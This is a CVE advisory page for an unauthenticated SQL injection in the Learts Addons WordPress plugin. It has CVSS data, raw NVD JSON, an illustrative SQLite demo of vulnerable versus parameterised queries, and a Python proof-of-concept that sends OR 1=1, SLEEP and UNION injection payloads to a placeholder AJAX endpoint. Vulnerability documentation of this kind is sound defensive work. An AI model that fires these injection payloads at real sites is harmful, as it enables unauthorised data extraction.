Security Vulnerability Report
CVE-2025-59557 CVSS 9.3 CRITICAL

CVE-2025-59557

Published: 2025-10-22 15:15:54
Last Modified: 2026-04-27 20:16:24

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability (CWE-89) in ThemeMove Learts Addons (WordPress plugin slug: learts-addons) allows SQL Injection. This issue affects Learts Addons: all versions before 1.7.5 (listed by the source as "from n/a through < 1.7.5"). The vector below records the issue as reachable without authentication or user interaction; the description does not name the affected function or parameter.
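The record names only the weakness class, so the following is an added illustration of the CWE-89 pattern the description refers to, not code from the Learts Addons plugin or the Patchstack advisory. It builds a constructed in-memory SQLite table, runs the same `test' OR 1=1 -- -` payload that the PoC further down sends, and contrasts a string-concatenated query with a parameterised one. Table, column and function names are this example's own assumptions.

```python
import sqlite3

# Constructed sample rows; they do not come from the plugin or any real site.
SAMPLE_ROWS = [
    (1, "public-post", "Public post", 0),
    (2, "draft-post", "Unpublished draft", 1),
    (3, "private-note", "Private note", 1),
]

# The "basic injection" payload used by the PoC on this page.
INJECTION = "test' OR 1=1 -- -"


def build_db():
    """Stand-in for a plugin table queried by an AJAX handler (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE items (id INTEGER, slug TEXT, title TEXT, hidden INTEGER)"
    )
    conn.executemany("INSERT INTO items VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, slug):
    """CWE-89: request input spliced into the SQL text.

    With the payload above the statement becomes
      ... WHERE slug = 'test' OR 1=1 -- -' AND hidden = 0
    so the comment marker discards the hidden = 0 filter and OR 1=1 matches
    every row, including the ones the filter was meant to hide.
    """
    sql = "SELECT id, title FROM items WHERE slug = '" + slug + "' AND hidden = 0"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, slug):
    """Same query with a bound parameter: the input is only ever a value."""
    sql = "SELECT id, title FROM items WHERE slug = ? AND hidden = 0"
    return conn.execute(sql, (slug,)).fetchall()


def demo():
    """Run the benign, injected and fixed lookups and return the row sets."""
    conn = build_db()
    return {
        "benign": lookup_vulnerable(conn, "public-post"),
        "injected": lookup_vulnerable(conn, INJECTION),
        "fixed": lookup_fixed(conn, INJECTION),
        "fixed_benign": lookup_fixed(conn, "public-post"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

In a WordPress plugin the equivalent of `lookup_fixed` is passing the input through `$wpdb->prepare()` with placeholders rather than concatenating it into the query string; the mechanism (value binding instead of string splicing) is the same as shown here.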

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

NVD provides no CPE configuration data for this record. The affected product, per the description, is the Learts Addons WordPress plugin (slug learts-addons), all versions before 1.7.5; version 1.7.5 is the first version reported as fixed.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59557 SQL Injection PoC for Learts Addons Plugin
# Target: WordPress site with Learts Addons plugin < 1.7.5
# Type: Unauthenticated SQL Injection
#
# The admin-ajax.php action and parameter names below are placeholders:
# neither the CVE description nor this page identifies the vulnerable
# handler, so they must be replaced with the real ones before any result
# from this script means anything.
import sys

import requests

# Target admin-ajax.php URL; pass a different one as the first argument.
target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com/wp-admin/admin-ajax.php"


def test_sql_injection():
    """Test for SQL injection vulnerability in Learts Addons."""
    # Placeholder action and parameter names.
    # Adjust the parameter name and endpoint based on actual vulnerable functionality.
    params = {
        "action": "learts_ajax_action",
        "learts_param": "test' OR 1=1 -- -",  # Basic injection test
    }

    # Time-based blind SQL injection payload (MySQL SLEEP).
    time_based_payload = {
        "action": "learts_ajax_action",
        "learts_param": "test' AND (SELECT * FROM (SELECT SLEEP(5))a) -- -",
    }

    # Union-based SQL injection to extract data (column count is a guess).
    union_payload = {
        "action": "learts_ajax_action",
        "learts_param": "test' UNION SELECT 1,2,3,4,5,6,7,8,9,10 -- -",
    }

    print("[*] Testing basic injection...")
    try:
        response = requests.post(target_url, data=params, timeout=10)
        # Weak heuristic: a 200 whose body lacks the word "error" is only a hint,
        # not evidence of injection; compare against a benign baseline request.
        if "error" not in response.text.lower() or response.status_code != 200:
            print("[!] Potential SQL injection detected")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

    print("[*] Testing time-based blind SQL injection...")
    try:
        response = requests.post(target_url, data=time_based_payload, timeout=15)
        # A delay of about 5 s matching SLEEP(5) is the only strong signal here;
        # repeat with a different sleep value to rule out a slow server.
        if response.elapsed.total_seconds() >= 5:
            print("[!] Time-based SQL injection confirmed!")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

    print("[*] Testing union-based SQL injection...")
    try:
        response = requests.post(target_url, data=union_payload, timeout=10)
        # HTTP 200 alone says nothing about the column count; inspect the body
        # for the marker values (1..10) before treating this as confirmed.
        if response.status_code == 200:
            print("[!] Union-based SQL injection possible")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    test_sql_injection()

References

https://patchstack.com/database/Wordpress/Plugin/learts-addons/vulnerability/wordpress-learts-addons-plugin-1-7-5-sql-injection-vulnerability?_s_id=cve (Patchstack advisory; the only reference listed in the NVD record)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-59557",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-22T15:15:54.117",
    "lastModified": "2026-04-27T20:16:24.090",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ThemeMove Learts Addons learts-addons allows SQL Injection.This issue affects Learts Addons: from n/a through < 1.7.5."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L",
            "baseScore": 9.3,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://patchstack.com/database/Wordpress/Plugin/learts-addons/vulnerability/wordpress-learts-addons-plugin-1-7-5-sql-injection-vulnerability?_s_id=cve",
        "source": "[email protected]"
      }
    ]
  }
}